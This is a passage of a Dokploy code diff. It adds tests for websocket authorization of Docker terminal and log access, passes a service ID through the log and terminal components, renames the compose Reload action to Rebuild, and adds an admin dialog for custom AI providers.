expect(quote([nodeId])).toBe(nodeId);
|
||||||
|
});
|
||||||
|
});
|
||||||
104
apps/dokploy/__test__/wss/authorize.test.ts
Normal file
104
apps/dokploy/__test__/wss/authorize.test.ts
Normal file
@@ -0,0 +1,104 @@
|
|||||||
|
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||||
|
|
||||||
|
// Mock the permission + server helpers the wss authorizer composes.
|
||||||
|
const mockHasPermission = vi.hoisted(() => vi.fn());
|
||||||
|
const mockFindMember = vi.hoisted(() => vi.fn());
|
||||||
|
const mockCheckServiceAccess = vi.hoisted(() => vi.fn());
|
||||||
|
vi.mock("@dokploy/server/services/permission", () => ({
|
||||||
|
hasPermission: mockHasPermission,
|
||||||
|
findMemberByUserId: mockFindMember,
|
||||||
|
checkServiceAccess: mockCheckServiceAccess,
|
||||||
|
}));
|
||||||
|
|
||||||
|
const mockGetAccessibleServerIds = vi.hoisted(() => vi.fn());
|
||||||
|
vi.mock("@dokploy/server", () => ({
|
||||||
|
getAccessibleServerIds: mockGetAccessibleServerIds,
|
||||||
|
}));
|
||||||
|
|
||||||
|
import {
|
||||||
|
canAccessDockerOverWss,
|
||||||
|
canAccessTerminalOverWss,
|
||||||
|
} from "@/server/wss/authorize";
|
||||||
|
|
||||||
|
const USER = { id: "user-1" };
|
||||||
|
const SESSION = { activeOrganizationId: "org-1" };
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
vi.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe("canAccessDockerOverWss", () => {
|
||||||
|
it("denies when there is no user or session", async () => {
|
||||||
|
expect(await canAccessDockerOverWss(null, SESSION)).toBe(false);
|
||||||
|
expect(await canAccessDockerOverWss(USER, null)).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("denies a member without docker permission", async () => {
|
||||||
|
mockHasPermission.mockResolvedValue(false);
|
||||||
|
expect(await canAccessDockerOverWss(USER, SESSION)).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows when the caller has docker permission (no server)", async () => {
|
||||||
|
mockHasPermission.mockResolvedValue(true);
|
||||||
|
expect(await canAccessDockerOverWss(USER, SESSION)).toBe(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("denies a remote server the caller cannot access, even with docker permission", async () => {
|
||||||
|
mockHasPermission.mockResolvedValue(true);
|
||||||
|
mockGetAccessibleServerIds.mockResolvedValue(new Set(["other-server"]));
|
||||||
|
expect(await canAccessDockerOverWss(USER, SESSION, "srv-1")).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows a remote server the caller can access", async () => {
|
||||||
|
mockHasPermission.mockResolvedValue(true);
|
||||||
|
mockGetAccessibleServerIds.mockResolvedValue(new Set(["srv-1"]));
|
||||||
|
expect(await canAccessDockerOverWss(USER, SESSION, "srv-1")).toBe(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("denies when the container belongs to a service the caller cannot access", async () => {
|
||||||
|
mockCheckServiceAccess.mockRejectedValue(new Error("no access"));
|
||||||
|
expect(await canAccessDockerOverWss(USER, SESSION, null, "svc-1")).toBe(
|
||||||
|
false,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows service access even without docker permission or server access", async () => {
|
||||||
|
// A member granted the service but without canAccessToDocker, whose
|
||||||
|
// service runs on a server they were not individually granted, must still
|
||||||
|
// read its logs — matches application.readLogs (service access only).
|
||||||
|
mockHasPermission.mockResolvedValue(false);
|
||||||
|
mockGetAccessibleServerIds.mockResolvedValue(new Set());
|
||||||
|
mockCheckServiceAccess.mockResolvedValue(undefined);
|
||||||
|
expect(
|
||||||
|
await canAccessDockerOverWss(USER, SESSION, "srv-remote", "svc-1"),
|
||||||
|
).toBe(true);
|
||||||
|
// Service path is authoritative — it must not fall through to docker/server.
|
||||||
|
expect(mockHasPermission).not.toHaveBeenCalled();
|
||||||
|
expect(mockGetAccessibleServerIds).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe("canAccessTerminalOverWss", () => {
|
||||||
|
it("denies the local host terminal to a plain member", async () => {
|
||||||
|
mockFindMember.mockResolvedValue({ role: "member" });
|
||||||
|
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(false);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows the local host terminal to an owner", async () => {
|
||||||
|
mockFindMember.mockResolvedValue({ role: "owner" });
|
||||||
|
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("allows the local host terminal to an admin", async () => {
|
||||||
|
mockFindMember.mockResolvedValue({ role: "admin" });
|
||||||
|
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
it("gates a remote server terminal on server access", async () => {
|
||||||
|
mockGetAccessibleServerIds.mockResolvedValue(new Set(["srv-1"]));
|
||||||
|
expect(await canAccessTerminalOverWss(USER, SESSION, "srv-1")).toBe(true);
|
||||||
|
expect(await canAccessTerminalOverWss(USER, SESSION, "srv-2")).toBe(false);
|
||||||
|
// role lookup must not be needed for the remote path
|
||||||
|
expect(mockFindMember).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
@@ -271,6 +271,7 @@ export const ShowGeneralApplication = ({ applicationId }: Props) => {
|
|||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
|
serviceId={applicationId}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
variant="outline"
|
variant="outline"
|
||||||
|
|||||||
@@ -50,9 +50,10 @@ export const badgeStateColor = (state: string) => {
|
|||||||
interface Props {
|
interface Props {
|
||||||
appName: string;
|
appName: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const ShowDockerLogs = ({ appName, serverId }: Props) => {
|
export const ShowDockerLogs = ({ appName, serverId, serviceId }: Props) => {
|
||||||
const [containerId, setContainerId] = useState<string | undefined>();
|
const [containerId, setContainerId] = useState<string | undefined>();
|
||||||
const [option, setOption] = useState<"swarm" | "native">("native");
|
const [option, setOption] = useState<"swarm" | "native">("native");
|
||||||
|
|
||||||
@@ -182,6 +183,7 @@ export const ShowDockerLogs = ({ appName, serverId }: Props) => {
|
|||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
containerId={containerId || "select-a-container"}
|
containerId={containerId || "select-a-container"}
|
||||||
runType={option}
|
runType={option}
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
</CardContent>
|
</CardContent>
|
||||||
</Card>
|
</Card>
|
||||||
|
|||||||
@@ -55,12 +55,14 @@ interface Props {
|
|||||||
appName: string;
|
appName: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
appType: "stack" | "docker-compose";
|
appType: "stack" | "docker-compose";
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const ShowComposeContainers = ({
|
export const ShowComposeContainers = ({
|
||||||
appName,
|
appName,
|
||||||
appType,
|
appType,
|
||||||
serverId,
|
serverId,
|
||||||
|
serviceId,
|
||||||
}: Props) => {
|
}: Props) => {
|
||||||
const { data, isPending, refetch } =
|
const { data, isPending, refetch } =
|
||||||
api.docker.getContainersByAppNameMatch.useQuery(
|
api.docker.getContainersByAppNameMatch.useQuery(
|
||||||
@@ -122,6 +124,7 @@ export const ShowComposeContainers = ({
|
|||||||
key={container.containerId}
|
key={container.containerId}
|
||||||
container={container}
|
container={container}
|
||||||
serverId={serverId}
|
serverId={serverId}
|
||||||
|
serviceId={serviceId}
|
||||||
onActionComplete={() => refetch()}
|
onActionComplete={() => refetch()}
|
||||||
/>
|
/>
|
||||||
))}
|
))}
|
||||||
@@ -142,12 +145,14 @@ interface ContainerRowProps {
|
|||||||
status: string;
|
status: string;
|
||||||
};
|
};
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
|
serviceId?: string;
|
||||||
onActionComplete: () => void;
|
onActionComplete: () => void;
|
||||||
}
|
}
|
||||||
|
|
||||||
const ContainerRow = ({
|
const ContainerRow = ({
|
||||||
container,
|
container,
|
||||||
serverId,
|
serverId,
|
||||||
|
serviceId,
|
||||||
onActionComplete,
|
onActionComplete,
|
||||||
}: ContainerRowProps) => {
|
}: ContainerRowProps) => {
|
||||||
const [logsOpen, setLogsOpen] = useState(false);
|
const [logsOpen, setLogsOpen] = useState(false);
|
||||||
@@ -236,6 +241,7 @@ const ContainerRow = ({
|
|||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
containerId={container.containerId}
|
containerId={container.containerId}
|
||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
|
serviceId={serviceId}
|
||||||
>
|
>
|
||||||
Terminal
|
Terminal
|
||||||
</DockerTerminalModal>
|
</DockerTerminalModal>
|
||||||
@@ -280,6 +286,7 @@ const ContainerRow = ({
|
|||||||
containerId={container.containerId}
|
containerId={container.containerId}
|
||||||
serverId={serverId}
|
serverId={serverId}
|
||||||
runType="native"
|
runType="native"
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
</div>
|
</div>
|
||||||
</DialogContent>
|
</DialogContent>
|
||||||
|
|||||||
@@ -84,19 +84,19 @@ export const ComposeActions = ({ composeId }: Props) => {
|
|||||||
)}
|
)}
|
||||||
{canDeploy && (
|
{canDeploy && (
|
||||||
<DialogAction
|
<DialogAction
|
||||||
title="Reload Compose"
|
title="Rebuild Compose"
|
||||||
description="Are you sure you want to reload this compose?"
|
description="Are you sure you want to rebuild this compose?"
|
||||||
type="default"
|
type="default"
|
||||||
onClick={async () => {
|
onClick={async () => {
|
||||||
await redeploy({
|
await redeploy({
|
||||||
composeId: composeId,
|
composeId: composeId,
|
||||||
})
|
})
|
||||||
.then(() => {
|
.then(() => {
|
||||||
toast.success("Compose reloaded successfully");
|
toast.success("Compose rebuilt successfully");
|
||||||
refetch();
|
refetch();
|
||||||
})
|
})
|
||||||
.catch(() => {
|
.catch(() => {
|
||||||
toast.error("Error reloading compose");
|
toast.error("Error rebuilding compose");
|
||||||
});
|
});
|
||||||
}}
|
}}
|
||||||
>
|
>
|
||||||
@@ -109,12 +109,14 @@ export const ComposeActions = ({ composeId }: Props) => {
|
|||||||
<TooltipTrigger asChild>
|
<TooltipTrigger asChild>
|
||||||
<div className="flex items-center">
|
<div className="flex items-center">
|
||||||
<RefreshCcw className="size-4 mr-1" />
|
<RefreshCcw className="size-4 mr-1" />
|
||||||
Reload
|
Rebuild
|
||||||
</div>
|
</div>
|
||||||
</TooltipTrigger>
|
</TooltipTrigger>
|
||||||
<TooltipPrimitive.Portal>
|
<TooltipPrimitive.Portal>
|
||||||
<TooltipContent sideOffset={5} className="z-60">
|
<TooltipContent sideOffset={5} className="z-60">
|
||||||
<p>Reload the compose without rebuilding it</p>
|
<p>
|
||||||
|
Rebuilds the compose without downloading the source code
|
||||||
|
</p>
|
||||||
</TooltipContent>
|
</TooltipContent>
|
||||||
</TooltipPrimitive.Portal>
|
</TooltipPrimitive.Portal>
|
||||||
</Tooltip>
|
</Tooltip>
|
||||||
@@ -206,6 +208,7 @@ export const ComposeActions = ({ composeId }: Props) => {
|
|||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
appType={data?.composeType || "docker-compose"}
|
appType={data?.composeType || "docker-compose"}
|
||||||
|
serviceId={data?.composeId}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
variant="outline"
|
variant="outline"
|
||||||
|
|||||||
@@ -35,9 +35,14 @@ export const DockerLogs = dynamic(
|
|||||||
interface Props {
|
interface Props {
|
||||||
appName: string;
|
appName: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const ShowDockerLogsStack = ({ appName, serverId }: Props) => {
|
export const ShowDockerLogsStack = ({
|
||||||
|
appName,
|
||||||
|
serverId,
|
||||||
|
serviceId,
|
||||||
|
}: Props) => {
|
||||||
const [option, setOption] = useState<"swarm" | "native">("native");
|
const [option, setOption] = useState<"swarm" | "native">("native");
|
||||||
const [containerId, setContainerId] = useState<string | undefined>();
|
const [containerId, setContainerId] = useState<string | undefined>();
|
||||||
|
|
||||||
@@ -167,6 +172,7 @@ export const ShowDockerLogsStack = ({ appName, serverId }: Props) => {
|
|||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
containerId={containerId || "select-a-container"}
|
containerId={containerId || "select-a-container"}
|
||||||
runType={option}
|
runType={option}
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
</CardContent>
|
</CardContent>
|
||||||
</Card>
|
</Card>
|
||||||
|
|||||||
@@ -35,12 +35,14 @@ interface Props {
|
|||||||
appName: string;
|
appName: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
appType: "stack" | "docker-compose";
|
appType: "stack" | "docker-compose";
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const ShowDockerLogsCompose = ({
|
export const ShowDockerLogsCompose = ({
|
||||||
appName,
|
appName,
|
||||||
appType,
|
appType,
|
||||||
serverId,
|
serverId,
|
||||||
|
serviceId,
|
||||||
}: Props) => {
|
}: Props) => {
|
||||||
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
|
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
|
||||||
{
|
{
|
||||||
@@ -104,6 +106,7 @@ export const ShowDockerLogsCompose = ({
|
|||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
containerId={containerId || "select-a-container"}
|
containerId={containerId || "select-a-container"}
|
||||||
runType="native"
|
runType="native"
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
</CardContent>
|
</CardContent>
|
||||||
</Card>
|
</Card>
|
||||||
|
|||||||
@@ -23,6 +23,7 @@ interface Props {
|
|||||||
containerId: string;
|
containerId: string;
|
||||||
serverId?: string | null;
|
serverId?: string | null;
|
||||||
runType: "swarm" | "native";
|
runType: "swarm" | "native";
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const priorities = [
|
export const priorities = [
|
||||||
@@ -52,6 +53,7 @@ export const DockerLogsId: React.FC<Props> = ({
|
|||||||
containerId,
|
containerId,
|
||||||
serverId,
|
serverId,
|
||||||
runType,
|
runType,
|
||||||
|
serviceId,
|
||||||
}) => {
|
}) => {
|
||||||
const { data } = api.docker.getConfig.useQuery(
|
const { data } = api.docker.getConfig.useQuery(
|
||||||
{
|
{
|
||||||
@@ -157,6 +159,10 @@ export const DockerLogsId: React.FC<Props> = ({
|
|||||||
params.append("serverId", serverId);
|
params.append("serverId", serverId);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (serviceId) {
|
||||||
|
params.append("serviceId", serviceId);
|
||||||
|
}
|
||||||
|
|
||||||
const wsUrl = `${protocol}//${
|
const wsUrl = `${protocol}//${
|
||||||
window.location.host
|
window.location.host
|
||||||
}/docker-container-logs?${params.toString()}`;
|
}/docker-container-logs?${params.toString()}`;
|
||||||
@@ -222,7 +228,7 @@ export const DockerLogsId: React.FC<Props> = ({
|
|||||||
ws.close();
|
ws.close();
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
}, [containerId, serverId, lines, search, since]);
|
}, [containerId, serverId, serviceId, lines, search, since]);
|
||||||
|
|
||||||
const handleDownload = () => {
|
const handleDownload = () => {
|
||||||
const logContent = filteredLogs
|
const logContent = filteredLogs
|
||||||
|
|||||||
@@ -23,12 +23,14 @@ interface Props {
|
|||||||
containerId: string;
|
containerId: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
children?: React.ReactNode;
|
children?: React.ReactNode;
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const DockerTerminalModal = ({
|
export const DockerTerminalModal = ({
|
||||||
children,
|
children,
|
||||||
containerId,
|
containerId,
|
||||||
serverId,
|
serverId,
|
||||||
|
serviceId,
|
||||||
}: Props) => {
|
}: Props) => {
|
||||||
const [mainDialogOpen, setMainDialogOpen] = useState(false);
|
const [mainDialogOpen, setMainDialogOpen] = useState(false);
|
||||||
const [confirmDialogOpen, setConfirmDialogOpen] = useState(false);
|
const [confirmDialogOpen, setConfirmDialogOpen] = useState(false);
|
||||||
@@ -74,6 +76,7 @@ export const DockerTerminalModal = ({
|
|||||||
id="terminal"
|
id="terminal"
|
||||||
containerId={containerId}
|
containerId={containerId}
|
||||||
serverId={serverId || ""}
|
serverId={serverId || ""}
|
||||||
|
serviceId={serviceId}
|
||||||
/>
|
/>
|
||||||
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
|
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
|
||||||
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>
|
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>
|
||||||
|
|||||||
@@ -10,12 +10,14 @@ interface Props {
|
|||||||
id: string;
|
id: string;
|
||||||
containerId?: string;
|
containerId?: string;
|
||||||
serverId?: string;
|
serverId?: string;
|
||||||
|
serviceId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export const DockerTerminal: React.FC<Props> = ({
|
export const DockerTerminal: React.FC<Props> = ({
|
||||||
id,
|
id,
|
||||||
containerId,
|
containerId,
|
||||||
serverId,
|
serverId,
|
||||||
|
serviceId,
|
||||||
}) => {
|
}) => {
|
||||||
const termRef = useRef(null);
|
const termRef = useRef(null);
|
||||||
const [activeWay, setActiveWay] = React.useState<string | undefined>("bash");
|
const [activeWay, setActiveWay] = React.useState<string | undefined>("bash");
|
||||||
@@ -38,7 +40,7 @@ export const DockerTerminal: React.FC<Props> = ({
|
|||||||
const addonFit = new FitAddon();
|
const addonFit = new FitAddon();
|
||||||
const protocol = window.location.protocol === "https:" ? "wss:" : "ws:";
|
const protocol = window.location.protocol === "https:" ? "wss:" : "ws:";
|
||||||
|
|
||||||
const wsUrl = `${protocol}//${window.location.host}/docker-container-terminal?containerId=${containerId}&activeWay=${activeWay}${serverId ? `&serverId=${serverId}` : ""}`;
|
const wsUrl = `${protocol}//${window.location.host}/docker-container-terminal?containerId=${containerId}&activeWay=${activeWay}${serverId ? `&serverId=${serverId}` : ""}${serviceId ? `&serviceId=${serviceId}` : ""}`;
|
||||||
|
|
||||||
const ws = new WebSocket(wsUrl);
|
const ws = new WebSocket(wsUrl);
|
||||||
|
|
||||||
|
|||||||
@@ -229,6 +229,7 @@ export const ShowGeneralLibsql = ({ libsqlId }: Props) => {
|
|||||||
)}
|
)}
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.libsqlId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -236,6 +236,7 @@ export const ShowGeneralMariadb = ({ mariadbId }: Props) => {
|
|||||||
))}
|
))}
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mariadbId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -230,6 +230,7 @@ export const ShowGeneralMongo = ({ mongoId }: Props) => {
|
|||||||
</TooltipProvider>
|
</TooltipProvider>
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mongoId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -228,6 +228,7 @@ export const ShowGeneralMysql = ({ mysqlId }: Props) => {
|
|||||||
</TooltipProvider>
|
</TooltipProvider>
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.mysqlId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -234,6 +234,7 @@ export const ShowGeneralPostgres = ({ postgresId }: Props) => {
|
|||||||
</TooltipProvider>
|
</TooltipProvider>
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.postgresId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -229,6 +229,7 @@ export const ShowGeneralRedis = ({ redisId }: Props) => {
|
|||||||
</TooltipProvider>
|
</TooltipProvider>
|
||||||
<DockerTerminalModal
|
<DockerTerminalModal
|
||||||
appName={data?.appName || ""}
|
appName={data?.appName || ""}
|
||||||
|
serviceId={data?.redisId}
|
||||||
serverId={data?.serverId || ""}
|
serverId={data?.serverId || ""}
|
||||||
>
|
>
|
||||||
<Button
|
<Button
|
||||||
|
|||||||
@@ -13,10 +13,14 @@ import {
|
|||||||
} from "@/components/ui/card";
|
} from "@/components/ui/card";
|
||||||
import { api } from "@/utils/api";
|
import { api } from "@/utils/api";
|
||||||
import { HandleAi } from "./handle-ai";
|
import { HandleAi } from "./handle-ai";
|
||||||
|
import { HandleAiProviders } from "./handle-ai-providers";
|
||||||
|
|
||||||
export const AiForm = () => {
|
export const AiForm = () => {
|
||||||
const { data: aiConfigs, refetch, isPending } = api.ai.getAll.useQuery();
|
const { data: aiConfigs, refetch, isPending } = api.ai.getAll.useQuery();
|
||||||
const { mutateAsync, isPending: isRemoving } = api.ai.delete.useMutation();
|
const { mutateAsync, isPending: isRemoving } = api.ai.delete.useMutation();
|
||||||
|
const { data: currentUser } = api.user.get.useQuery();
|
||||||
|
const isOrgAdmin =
|
||||||
|
currentUser?.role === "owner" || currentUser?.role === "admin";
|
||||||
|
|
||||||
return (
|
return (
|
||||||
<div className="w-full">
|
<div className="w-full">
|
||||||
@@ -30,7 +34,10 @@ export const AiForm = () => {
|
|||||||
</CardTitle>
|
</CardTitle>
|
||||||
<CardDescription>Manage your AI configurations</CardDescription>
|
<CardDescription>Manage your AI configurations</CardDescription>
|
||||||
</div>
|
</div>
|
||||||
|
<div className="flex flex-row gap-2">
|
||||||
|
{isOrgAdmin && <HandleAiProviders />}
|
||||||
{aiConfigs && aiConfigs?.length > 0 && <HandleAi />}
|
{aiConfigs && aiConfigs?.length > 0 && <HandleAi />}
|
||||||
|
</div>
|
||||||
</CardHeader>
|
</CardHeader>
|
||||||
<CardContent className="space-y-2 py-8 border-t">
|
<CardContent className="space-y-2 py-8 border-t">
|
||||||
{isPending ? (
|
{isPending ? (
|
||||||
|
|||||||
@@ -0,0 +1,158 @@
|
|||||||
|
"use client";
|
||||||
|
import { standardSchemaResolver as zodResolver } from "@hookform/resolvers/standard-schema";
|
||||||
|
import { PlusIcon, ServerIcon, Trash2 } from "lucide-react";
|
||||||
|
import { useEffect, useState } from "react";
|
||||||
|
import { useFieldArray, useForm } from "react-hook-form";
|
||||||
|
import { toast } from "sonner";
|
||||||
|
import { z } from "zod";
|
||||||
|
import { Button } from "@/components/ui/button";
|
||||||
|
import {
|
||||||
|
Dialog,
|
||||||
|
DialogContent,
|
||||||
|
DialogDescription,
|
||||||
|
DialogHeader,
|
||||||
|
DialogTitle,
|
||||||
|
DialogTrigger,
|
||||||
|
} from "@/components/ui/dialog";
|
||||||
|
import {
|
||||||
|
Form,
|
||||||
|
FormControl,
|
||||||
|
FormField,
|
||||||
|
FormItem,
|
||||||
|
FormMessage,
|
||||||
|
} from "@/components/ui/form";
|
||||||
|
import { Input } from "@/components/ui/input";
|
||||||
|
import { api } from "@/utils/api";
|
||||||
|
|
||||||
|
const Schema = z.object({
|
||||||
|
providers: z.array(
|
||||||
|
z.object({
|
||||||
|
name: z.string().min(1, { message: "Name is required" }),
|
||||||
|
apiUrl: z.string().url({ message: "Please enter a valid URL" }),
|
||||||
|
}),
|
||||||
|
),
|
||||||
|
});
|
||||||
|
|
||||||
|
type Schema = z.infer<typeof Schema>;
|
||||||
|
|
||||||
|
export const HandleAiProviders = () => {
|
||||||
|
const utils = api.useUtils();
|
||||||
|
const [open, setOpen] = useState(false);
|
||||||
|
const { data: providers } = api.ai.getCustomProviders.useQuery();
|
||||||
|
const { mutateAsync, isPending } = api.ai.saveCustomProviders.useMutation();
|
||||||
|
|
||||||
|
const form = useForm<Schema>({
|
||||||
|
resolver: zodResolver(Schema),
|
||||||
|
defaultValues: {
|
||||||
|
providers: [],
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const { fields, append, remove } = useFieldArray({
|
||||||
|
control: form.control,
|
||||||
|
name: "providers",
|
||||||
|
});
|
||||||
|
|
||||||
|
useEffect(() => {
|
||||||
|
if (open) {
|
||||||
|
form.reset({ providers: providers ?? [] });
|
||||||
|
}
|
||||||
|
}, [open, providers, form]);
|
||||||
|
|
||||||
|
const onSubmit = async (data: Schema) => {
|
||||||
|
try {
|
||||||
|
await mutateAsync({ providers: data.providers });
|
||||||
|
await utils.ai.getCustomProviders.invalidate();
|
||||||
|
toast.success("Custom providers saved successfully");
|
||||||
|
setOpen(false);
|
||||||
|
} catch (error) {
|
||||||
|
toast.error("Failed to save custom providers", {
|
||||||
|
description: error instanceof Error ? error.message : "Unknown error",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
return (
|
||||||
|
<Dialog open={open} onOpenChange={setOpen}>
|
||||||
|
<DialogTrigger asChild>
|
||||||
|
<Button variant="outline" className="cursor-pointer space-x-3">
|
||||||
|
<ServerIcon className="h-4 w-4" />
|
||||||
|
Custom Presets
|
||||||
|
</Button>
|
||||||
|
</DialogTrigger>
|
||||||
|
<DialogContent className="sm:max-w-xl">
|
||||||
|
<DialogHeader>
|
||||||
|
<DialogTitle>Custom AI Providers</DialogTitle>
|
||||||
|
<DialogDescription>
|
||||||
|
Define your own AI providers, like an internal LLM platform. When at
|
||||||
|
least one is defined, only these providers can be used in AI
|
||||||
|
configurations.
|
||||||
|
</DialogDescription>
|
||||||
|
</DialogHeader>
|
||||||
|
<Form {...form}>
|
||||||
|
<form onSubmit={form.handleSubmit(onSubmit)} className="space-y-4">
|
||||||
|
{fields.length === 0 && (
|
||||||
|
<p className="text-sm text-muted-foreground">
|
||||||
|
No custom providers defined. The built-in provider list will be
|
||||||
|
used.
|
||||||
|
</p>
|
||||||
|
)}
|
||||||
|
{fields.map((fieldItem, index) => (
|
||||||
|
<div key={fieldItem.id} className="flex gap-2 items-start">
|
||||||
|
<FormField
|
||||||
|
control={form.control}
|
||||||
|
name={`providers.${index}.name`}
|
||||||
|
render={({ field }) => (
|
||||||
|
<FormItem className="flex-1">
|
||||||
|
<FormControl>
|
||||||
|
<Input placeholder="Internal LLM" {...field} />
|
||||||
|
</FormControl>
|
||||||
|
<FormMessage />
|
||||||
|
</FormItem>
|
||||||
|
)}
|
||||||
|
/>
|
||||||
|
<FormField
|
||||||
|
control={form.control}
|
||||||
|
name={`providers.${index}.apiUrl`}
|
||||||
|
render={({ field }) => (
|
||||||
|
<FormItem className="flex-[2]">
|
||||||
|
<FormControl>
|
||||||
|
<Input
|
||||||
|
placeholder="https://llm.internal.company/v1"
|
||||||
|
{...field}
|
||||||
|
/>
|
||||||
|
</FormControl>
|
||||||
|
<FormMessage />
|
||||||
|
</FormItem>
|
||||||
|
)}
|
||||||
|
/>
|
||||||
|
<Button
|
||||||
|
type="button"
|
||||||
|
variant="ghost"
|
||||||
|
size="icon"
|
||||||
|
className="group hover:bg-red-500/10"
|
||||||
|
onClick={() => remove(index)}
|
||||||
|
>
|
||||||
|
<Trash2 className="size-4 text-primary group-hover:text-red-500" />
|
||||||
|
</Button>
|
||||||
|
</div>
|
||||||
|
))}
|
||||||
|
<div className="flex justify-between">
|
||||||
|
<Button
|
||||||
|
type="button"
|
||||||
|
variant="outline"
|
||||||
|
onClick={() => append({ name: "", apiUrl: "" })}
|
||||||
|
>
|
||||||
|
<PlusIcon className="h-4 w-4" />
|
||||||
|
Add Provider
|
||||||
|
</Button>
|
||||||
|
<Button type="submit" isLoading={isPending}>
|
||||||
|
Save
|
||||||
|
</Button>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</Form>
|
||||||
|
</DialogContent>
|
||||||
|
</Dialog>
|
||||||
|
);
|
||||||
|
};
|
||||||
@@ -99,6 +99,11 @@ export const HandleAi = ({ aiId }: Props) => {
|
|||||||
enabled: !!aiId,
|
enabled: !!aiId,
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
const { data: customProviders } = api.ai.getCustomProviders.useQuery();
|
||||||
|
const hasCustomProviders = (customProviders?.length ?? 0) > 0;
|
||||||
|
const providerOptions: { name: string; apiUrl: string }[] = hasCustomProviders
|
||||||
|
? (customProviders ?? [])
|
||||||
|
: [...AI_PROVIDERS];
|
||||||
const { mutateAsync, isPending } = aiId
|
const { mutateAsync, isPending } = aiId
|
||||||
? api.ai.update.useMutation()
|
? api.ai.update.useMutation()
|
